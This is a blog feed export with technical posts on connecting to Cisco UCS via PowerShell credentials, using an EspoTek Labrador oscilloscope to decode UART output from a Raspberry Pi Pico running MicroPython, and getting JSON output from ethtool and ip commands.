SYSTEM.ENVIRONMENT class, see</div><div>Environment Methods.</div></div><div><br /></div><h3 style="text-align: left;">Creating Credentials</h3><div>From the blog at <a href="https://blogs.cisco.com/developer/cisco-ucs-automation-part2-a-step-by-step-guide-to-connecting-and-disconnecting-using-ucs-powertool">https://blogs.cisco.com/developer/cisco-ucs-automation-part2-a-step-by-step-guide-to-connecting-and-disconnecting-using-ucs-powertool</a></div><div><br /></div><div><span style="font-family: courier;"><b>Connect-Ucs -Name 10.10.20.113</b></span></div><div><br /></div><div><span style="font-family: courier;"><b>$ucsm_credentials = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "username", $(ConvertTo-SecureString -Force -AsPlainText "password")</b></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><b>write-output $ucsm_credentials</b></span></div><div><span style="font-family: courier;"><div><br /></div><div>UserName Password</div><div>-------- --------</div><div>username System.Security.SecureString</div><div><br /></div><div><b> Disconnect-Ucs</b></div><div><b><br /></b></div><div><h3 style="font-family: "Times New Roman";">Using Credentials </h3></div><div><br /></div><div><div><b>Connect-Ucs -Name 10.10.20.113 -Credential $ucsm_credentials</b></div></div><div><br /></div></span></div><div><span style="font-family: courier;"><br /></span></div><div><span style="font-family: courier;"><br /></span></div><div><br /></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-302595579625271402021-05-30T18:46:00.002-07:002021-06-02T23:20:40.005-07:00EspoTek Labrador Oscilloscope: Day Two<p>In case, you're not just interested in what happened with the Labrador, this series of posts begins with EspoTek Labrador Oscilloscope: Day One.</p><p><span style="font-weight: 700;">Progress for Day Two</span></p><p>Accomplished using the logic analyzer to decode serial text by connecting Logic Analyzer CH1 on the Labrador to GPIO Pin 1 (GP1) on the Pico as shown in the Pico Pinout below. </p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-X3j6GvXICtw/YLQ9ehfFTLI/AAAAAAABhlE/z7ClbLNPZ5YO4K7WZiMxdzd8yz1e4gqRwCLcBGAsYHQ/s1169/Pico-R3-A4-Pinout_UART_LOOPBACK.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="826" data-original-width="1169" height="335" src="https://1.bp.blogspot.com/-X3j6GvXICtw/YLQ9ehfFTLI/AAAAAAABhlE/z7ClbLNPZ5YO4K7WZiMxdzd8yz1e4gqRwCLcBGAsYHQ/w474-h335/Pico-R3-A4-Pinout_UART_LOOPBACK.png" width="474" /></a></div><p></p><p><br /></p><p>The text that was sent was from this MicroPython code using UART0 and UART1 in a loopback configuration. I added the simple_date function to output a timestamp. I moved code from the __main__ part of the script into the main() function and added continuous looping to the original example:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p></p></blockquote><div style="text-align: left;"><span style="font-family: courier; font-size: x-small;"><b>'''<br />Simple UART loopback Python example for Pico Microcontroller derived from:<br />https://github.com/raspberrypi/pico-micropython-examples/tree/master/uart/loopback<br />By Keith Wright (WrightRocket)<br />'''<br />from machine import UART, Pin<br />import time<br />def simple_date(year, month, date, hour, minute, second, weekday, yearday):<br /> return "{0:4}-{1:02d}-{2:02d}T{3:02d}:{4:02d}:{5:02d}".format(<br /> year, month, date, hour, minute, second)<br />uart0 = UART(0, baudrate=9600, tx=Pin(0), rx=Pin(1)) # Connect GP0 to GP5<br />uart1 = UART(1, baudrate=9600, tx=Pin(4), rx=Pin(5)) # Connect GP1 to GP4<br />def hello_world(delay=0.5):<br /> while True:<br /> txData = b'hello world\n\r'<br /> uart1.write(txData)<br /> time.sleep(delay)<br /> dateStr = simple_date(*time.localtime())<br /> dateBytes = bytes(dateStr + '\n\r', 'utf-8')<br /> uart1.write(dateBytes)<br /> <br /> time.sleep(delay)<br /> rxData = bytes()<br /> while uart0.any() > 0:<br /> rxData += uart0.read(1)<br /> print(rxData.decode('utf-8'))</b></span></div><div style="text-align: left;"><span style="font-family: courier; font-size: x-small;"><b><br />if __name__ == '__main__':<br /> <br /> hello_world() # OR helloworld(0.1) OR helloworld(delay=1) </b></span></div><p style="text-align: left;"><span style="font-family: courier;"> </span></p><p></p><div class="separator" style="clear: both; text-align: left;"><span style="font-family: helvetica;">The final image shows the use of Logic Analyzer CH 1 with Serial Decoding selected. The lower-left corner displays the decoded text from the program above. The same GPIO Pin 1 (GP1) on the Pico is connected to both the Logic Analyzer CH 1 wire and the Oscilloscope CH 1 wire.</span></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: courier;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dPNqE-R_pQc/YLQ9u6kSTVI/AAAAAAABhlM/mmKxVuM5bhsZFq5KsLkXIYS5xXmDeh8TgCLcBGAsYHQ/s1602/Screenshot%2Bfrom%2B2021-05-30%2B17-56-01.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: courier;"><img border="0" data-original-height="875" data-original-width="1602" height="322" src="https://1.bp.blogspot.com/-dPNqE-R_pQc/YLQ9u6kSTVI/AAAAAAABhlM/mmKxVuM5bhsZFq5KsLkXIYS5xXmDeh8TgCLcBGAsYHQ/w589-h322/Screenshot%2Bfrom%2B2021-05-30%2B17-56-01.png" width="589" /></span></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><br /><p></p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-12721803403187148242021-05-30T03:33:00.013-07:002021-05-31T11:59:07.285-07:00EspoTek Labrador Oscilloscope: Day One<h3 style="text-align: left;">Day One - Where Do I Begin?</h3><p>I received the EspoTek Labrador Oscilliscope the same day that I ordered it on Amazon for $29. I had been up late into the morning and ordered it at about 4 AM, and had it in my shipping locker by 7 PM. I barely had an opportunity to do my research. </p><p>When I was shopping for such a tool to be used with small electronics projects, I was impressed with the fact that the Labrador used open-source software that was actively being developed and available on GitHub at: <a href="https://github.com/EspoTek/Labrador">https://github.com/EspoTek/Labrador</a>. On Linux, it is a breeze to get the application running!</p><p>You can download a Linux release of an AppImage and then make it executable. EspoTek_Labrador-2aa9340-x86_64.AppImage is the file I downloaded. I created a symlink from $HOME/bin/lab to the executable file to make launching it as easy as typing "lab".</p><div>The EspoTek company's website provides details about their open-source hardware Labrador product at: <a href="https://espotek.com/labrador/">https://espotek.com/labrador/</a>. The site boasts that all you need is a micro-USB cable and you can take advantage of the following features:</div><ul style="background-color: white; box-sizing: inherit; color: #686868; font-family: sourcesanspro, Helvetica, Tahoma, Geneva, Arial, sans-serif; font-size: 16px; margin-bottom: 1.5rem; margin-left: 1.5rem; margin-top: 1.5rem; padding: 0px;"><li style="box-sizing: inherit;">Oscilloscope (2 channel, 750ksps)</li><li style="box-sizing: inherit;">Arbitrary Waveform Generator (2 channel, 1MSPS per channel)</li><li style="box-sizing: inherit;">Power Supply (4.5 to 12V, 0.75W max output, with closed-loop feedback)</li><li style="box-sizing: inherit;">Logic Analyzer (2 channel, 3MSPS per channel, with serial decoding)</li><li style="box-sizing: inherit;">Multimeter (V/I/R/C)</li></ul><div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-iJfj8ETzBVc/YLNg_M64jnI/AAAAAAABhhs/pG3sRTWkkpc_3D0GkOb00zFiDOIOnMPgQCLcBGAsYHQ/s1582/uart_time_screen_settings_markup.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="861" data-original-width="1582" height="258" src="https://1.bp.blogspot.com/-iJfj8ETzBVc/YLNg_M64jnI/AAAAAAABhhs/pG3sRTWkkpc_3D0GkOb00zFiDOIOnMPgQCLcBGAsYHQ/w543-h258/uart_time_screen_settings_markup.png" width="543" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><h4 style="clear: both; text-align: center;"><div style="text-align: left;"><br /></div><div style="text-align: left;">Progress for Day One</div><div style="text-align: left;"><span style="font-weight: normal;">Once I figured out how to run the AppImage, I found the Labrador pinout diagram at</span><span style="text-align: center;"> </span><a href="https://github.com/EspoTek/Labrador" style="font-weight: 400;">https://github.com/EspoTek/Labrador</a><span style="font-weight: 400;">. I hacked away at this example that was simple to configure with the Pico, and I got the above screen capture using a DuPont wire from Oscilloscope CH 1(DC) to GP0 on the Pico. To generate the shown activity, this example: <a href="https://github.com/raspberrypi/pico-micropython-examples/tree/master/uart/loopback">https://github.com/raspberrypi/pico-micropython-examples/tree/master/uart/loopback</a>, caused UART operations on the first GPIO pin, GP0.</span></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-aejc0WJMySY/YLNr0xtKsVI/AAAAAAABhiE/Gl17cCgvSmwrW34AUcz-CMfAFpU8TzIOQCLcBGAsYHQ/s999/espotek-labrador-pinout.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="999" data-original-width="840" height="460" src="https://1.bp.blogspot.com/-aejc0WJMySY/YLNr0xtKsVI/AAAAAAABhiE/Gl17cCgvSmwrW34AUcz-CMfAFpU8TzIOQCLcBGAsYHQ/w387-h460/espotek-labrador-pinout.png" width="387" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dgYvBf9mRsU/YLNqAwP2zrI/AAAAAAABhh8/cUxfX08FdJkLh-MgJ4u-qTP4ewgzbaFiwCLcBGAsYHQ/s1169/Pico-R3-A4-Pinout.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="826" data-original-width="1169" height="331" src="https://1.bp.blogspot.com/-dgYvBf9mRsU/YLNqAwP2zrI/AAAAAAABhh8/cUxfX08FdJkLh-MgJ4u-qTP4ewgzbaFiwCLcBGAsYHQ/w468-h331/Pico-R3-A4-Pinout.png" width="468" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><span style="font-weight: 400;"><br /></span></div></h4><span face="sourcesanspro, Helvetica, Tahoma, Geneva, Arial, sans-serif" style="color: #686868;"><br /></span></div>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-79600017089319251132021-05-24T00:12:00.008-07:002024-02-02T23:50:46.813-08:00Ethtool and Ip Commands Output JSON<p> The <b>ethtool</b> command has finally gotten the ability to output some information in JSON. I read something about it a few weeks ago where ethtool, and it has begun filtering down into the Fedora Linux distribution. </p><p>There was a post to the ethtool-next branch that I saw here: <a href="https://www.spinics.net/lists/netdev/msg736816.html">https://www.spinics.net/lists/netdev/msg736816.html</a>. This had this example, which looks really promising.</p><pre style="white-space: pre-wrap;"># <b>ethtool -S eth0 --groups eth-phy eth-mac rmon</b>
Stats for eth0:
eth-phy-SymbolErrorDuringCarrier: 1
eth-mac-FramesTransmittedOK: 1
eth-mac-FrameTooLongErrors: 1
rmon-etherStatsUndersizePkts: 1
rmon-etherStatsJabbers: 1
rmon-rx-etherStatsPkts64Octets: 1
rmon-rx-etherStatsPkts128to255Octets: 1
rmon-rx-etherStatsPkts1024toMaxOctets: 0
In JSON form stats are grouped and histograms are broken out:
# <b>ethtool --json -S eth0 --groups eth-phy eth-mac rmon | jq</b>
[
{
"ifname": "eth0",
"eth-phy": {
"SymbolErrorDuringCarrier": 1
},
"eth-mac": {
"FramesTransmittedOK": 1,
"FrameTooLongErrors": 0
},
"rmon": {
"etherStatsUndersizePkts": 1,
"etherStatsJabbers": 0,
"rx-pktsNtoM": [
{
"low": 0,
"high": 64,
"val": 1
},
{
"low": 128,
"high": 255,
"val": 1
},
{
"low": 1024,
"high": 0,
"val": 0
}
]
}
}
]</pre><p><br /></p><p>The example above with --json doesn't work. Here are the first working examples that I have found in the Linux 5.11 kernel with ethtool-5.12-1.fc33.x86_64. The documentation doesn't say which functions support it, but I found this example works.</p><pre>[root@ryzen5 rules.d]# <b>ethtool -a eth0 </b>
Pause parameters for eth0:
Autonegotiate: on
RX: on
TX: on
[root@ryzen5 rules.d]# <b>ethtool --json -a eth0</b>
[ {
"ifname": "eth0",
"autonegotiate": true,
"rx": true,
"tx": true
} ]
</pre><pre><br /></pre><pre>I have found some examples in the <a href="https://git.kernel.org/pub/scm/network/ethtool/ethtool.git" target="_blank">source code for ethtool</a>, but they don't work on my device. </pre><pre><span style="color: #26a269;"><b>keith@ryzen5</b></span>:<span style="color: #12488b;"><b>/usr/local/src/ethtool5.12/ethtool</b></span>$ git log | grep -i json
- fix Rx vs Tx histogram in <span style="color: #c01c28;"><b>JSON</b></span>
In <span style="color: #c01c28;"><b>JSON</b></span> form stats are grouped and histograms are broken out:
# ethtool --<span style="color: #c01c28;"><b>json</b></span> -S eth0 --groups eth-phy eth-mac rmon | jq
# ethtool --<span style="color: #c01c28;"><b>json</b></span> -S eth0 --groups eth-phy eth-mac rmon | \
# ethtool --<span style="color: #c01c28;"><b>json</b></span> -I --show-fec eth0
<span style="color: #c01c28;"><b>JSON</b></span> support included.
<span style="color: #c01c28;"><b>json</b></span>: improve array print API
In ethtool when we print an array we usually have a label (non-<span style="color: #c01c28;"><b>JSON</b></span>)
and a key (<span style="color: #c01c28;"><b>JSON</b></span>), because arrays are most often printed entry-per-line
Use this knowledge in the <span style="color: #c01c28;"><b>json</b></span> array API to make it simpler to use.
At the same time (similarly to open_<span style="color: #c01c28;"><b>json</b></span>_object()) do not require
want nothing printed for non-<span style="color: #c01c28;"><b>JSON</b></span> output.
First pause frame info is extended to support --<span style="color: #c01c28;"><b>json</b></span>.
# ./ethtool -I --<span style="color: #c01c28;"><b>json</b></span> -a eth0
being prefixed by --debug and --<span style="color: #c01c28;"><b>json</b></span> options, and we're
pause: add --<span style="color: #c01c28;"><b>json</b></span> support
<span style="color: #c01c28;"><b>JSON</b></span>:
# ./ethtool --<span style="color: #c01c28;"><b>json</b></span> -a eth0
Use the signed <span style="color: #c01c28;"><b>JSON</b></span> helper for printing the TDR amplitude. Otherwise
visualize the data. So add <span style="color: #c01c28;"><b>JSON</b></span> support, by borrowing code from
Use <span style="color: #c01c28;"><b>json</b></span>_print from iproute2.
ethtool.8.in: Add --<span style="color: #c01c28;"><b>json</b></span> option
Document the --<span style="color: #c01c28;"><b>json</b></span> option, which the --cable-test and
Add --<span style="color: #c01c28;"><b>json</b></span> command line argument parsing
Allow --<span style="color: #c01c28;"><b>json</b></span> to be passed as an option to select <span style="color: #c01c28;"><b>JSON</b></span> output. The
<span style="color: #c01c28;"><b>JSON</b></span> outputters.
<span style="color: #c01c28;"><b>json</b></span>_writer/<span style="color: #c01c28;"><b>json</b></span>_print: Import the iproute2 helper code for <span style="color: #c01c28;"><b>JSON</b></span> output
In general, Linux network tools use <span style="color: #c01c28;"><b>JSON</b></span> for machine readable output.
See for example -<span style="color: #c01c28;"><b>json</b></span> for iproute2 and devlink. In order to support
<span style="color: #c01c28;"><b>JSON</b></span> output from ethtool, import the iproute2 helper code.
</pre><pre><br /></pre><h3 style="text-align: left;">ip -json addr | netconf | route with jq</h3><pre>From the references to iproute2, this led me to discover that the "ip" command from the iproute2 package supports JSON.</pre><h3 style="text-align: left;"><span style="font-family: "Times New Roman"; white-space: normal;">ip -json netconf</span></h3><pre><span style="color: #26a269;"><b>keith@ryzen5</b></span>:<span style="color: #12488b;"><b>/usr/local/src/ethtool5.12/ethtool</b></span>$ ip -json netconf | jq '.[3:5]'
<b>[</b>
<b> {</b>
<b> </b><span style="color: #12488b;"><b>"family"</b></span><b>: </b><span style="color: #26a269;">"inet"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"interface"</b></span><b>: </b><span style="color: #26a269;">"wlan0"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"forwarding"</b></span><b>: </b>true<b>,</b>
<b> </b><span style="color: #12488b;"><b>"rp_filter"</b></span><b>: </b><span style="color: #26a269;">"loose"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"mc_forwarding"</b></span><b>: </b>false<b>,</b>
<b> </b><span style="color: #12488b;"><b>"proxy_neigh"</b></span><b>: </b>false<b>,</b>
<b> </b><span style="color: #12488b;"><b>"ignore_routes_with_linkdown"</b></span><b>: </b>false
<b> },</b>
<b> {</b>
<b> </b><span style="color: #12488b;"><b>"family"</b></span><b>: </b><span style="color: #26a269;">"inet"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"interface"</b></span><b>: </b><span style="color: #26a269;">"eth0"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"forwarding"</b></span><b>: </b>true<b>,</b>
<b> </b><span style="color: #12488b;"><b>"rp_filter"</b></span><b>: </b><span style="color: #26a269;">"loose"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"mc_forwarding"</b></span><b>: </b>false<b>,</b>
<b> </b><span style="color: #12488b;"><b>"proxy_neigh"</b></span><b>: </b>false<b>,</b>
<b> </b><span style="color: #12488b;"><b>"ignore_routes_with_linkdown"</b></span><b>: </b>false
<b> }</b>
<b>]</b>
</pre><pre><h3 style="font-family: "Times New Roman"; white-space: normal;">ip -json addr show eth0</h3></pre><pre style="text-align: left;"><span style="color: #26a269;"><b>keith@ryzen5</b></span>:<span style="color: #12488b;"><b>/usr/local/src/ethtool5.12/ethtool</b></span>$ ip -json addr show eth0 | jq '.[4]'
<b>{</b>
<b> </b><span style="color: #12488b;"><b>"ifindex"</b></span><b>: </b>11<b>,</b>
<b> </b><span style="color: #12488b;"><b>"ifname"</b></span><b>: </b><span style="color: #26a269;">"eth0"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"flags"</b></span><b>: [</b>
<b> </b><span style="color: #26a269;">"BROADCAST"</span><b>,</b>
<b> </b><span style="color: #26a269;">"MULTICAST"</span><b>,</b>
<b> </b><span style="color: #26a269;">"UP"</span><b>,</b>
<b> </b><span style="color: #26a269;">"LOWER_UP"</span>
<b> ],</b>
<b> </b><span style="color: #12488b;"><b>"mtu"</b></span><b>: </b>1500<b>,</b>
<b> </b><span style="color: #12488b;"><b>"qdisc"</b></span><b>: </b><span style="color: #26a269;">"mq"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"operstate"</b></span><b>: </b><span style="color: #26a269;">"UP"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"group"</b></span><b>: </b><span style="color: #26a269;">"default"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"txqlen"</b></span><b>: </b>1000<b>,</b>
<b> </b><span style="color: #12488b;"><b>"link_type"</b></span><b>: </b><span style="color: #26a269;">"ether"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"address"</b></span><b>: </b><span style="color: #26a269;">"30:9c:23:b6:0e:38"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"broadcast"</b></span><b>: </b><span style="color: #26a269;">"ff:ff:ff:ff:ff:ff"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"addr_info"</b></span><b>: [</b>
<b> {</b>
<b> </b><span style="color: #12488b;"><b>"family"</b></span><b>: </b><span style="color: #26a269;">"inet"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"local"</b></span><b>: </b><span style="color: #26a269;">"192.168.1.84"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"prefixlen"</b></span><b>: </b>24<b>,</b>
<b> </b><span style="color: #12488b;"><b>"broadcast"</b></span><b>: </b><span style="color: #26a269;">"192.168.1.255"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"scope"</b></span><b>: </b><span style="color: #26a269;">"global"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"noprefixroute"</b></span><b>: </b>true<b>,</b>
<b> </b><span style="color: #12488b;"><b>"label"</b></span><b>: </b><span style="color: #26a269;">"eth0"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"valid_life_time"</b></span><b>: </b>4294967295<b>,</b>
<b> </b><span style="color: #12488b;"><b>"preferred_life_time"</b></span><b>: </b>4294967295
<b> },</b>
<b> {</b>
<b> </b><span style="color: #12488b;"><b>"family"</b></span><b>: </b><span style="color: #26a269;">"inet6"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"local"</b></span><b>: </b><span style="color: #26a269;">"fe80::6d18:b785:b17f:3a55"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"prefixlen"</b></span><b>: </b>64<b>,</b>
<b> </b><span style="color: #12488b;"><b>"scope"</b></span><b>: </b><span style="color: #26a269;">"link"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"noprefixroute"</b></span><b>: </b>true<b>,</b>
<b> </b><span style="color: #12488b;"><b>"valid_life_time"</b></span><b>: </b>4294967295<b>,</b>
<b> </b><span style="color: #12488b;"><b>"preferred_life_time"</b></span><b>: </b>4294967295
<b> }</b>
<b> ]</b>
<b>}</b></pre><pre><span style="color: #26a269;"><b>keith@ryzen5</b></span>:<span style="color: #12488b;"><b>/usr/local/src/ethtool5.12/ethtool</b></span>$ ip -json addr show eth0 | jq '.[4].addr_info[0]'</pre><pre><b>{</b>
<b> </b><span style="color: #12488b;"><b>"family"</b></span><b>: </b><span style="color: #26a269;">"inet"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"local"</b></span><b>: </b><span style="color: #26a269;">"192.168.1.84"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"prefixlen"</b></span><b>: </b>24<b>,</b>
<b> </b><span style="color: #12488b;"><b>"broadcast"</b></span><b>: </b><span style="color: #26a269;">"192.168.1.255"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"scope"</b></span><b>: </b><span style="color: #26a269;">"global"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"noprefixroute"</b></span><b>: </b>true<b>,</b>
<b> </b><span style="color: #12488b;"><b>"label"</b></span><b>: </b><span style="color: #26a269;">"eth0"</span><b>,</b>
<b> </b><span style="color: #12488b;"><b>"valid_life_time"</b></span><b>: </b>4294967295<b>,</b>
<b> </b><span style="color: #12488b;"><b>"preferred_life_time"</b></span><b>: </b>4294967295
<b>}</b>
<span style="color: #26a269;"><b>keith@ryzen5</b></span>:<span style="color: #12488b;"><b>/usr/local/src/ethtool5.12/ethtool</b></span>$ ip -json addr show eth0 | jq '.[4].addr_info[0].local'</pre><pre style="text-align: left;"><span style="color: #26a269;">"192.168.1.84"</span>
</pre><h3><br /></h3><pre></pre>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0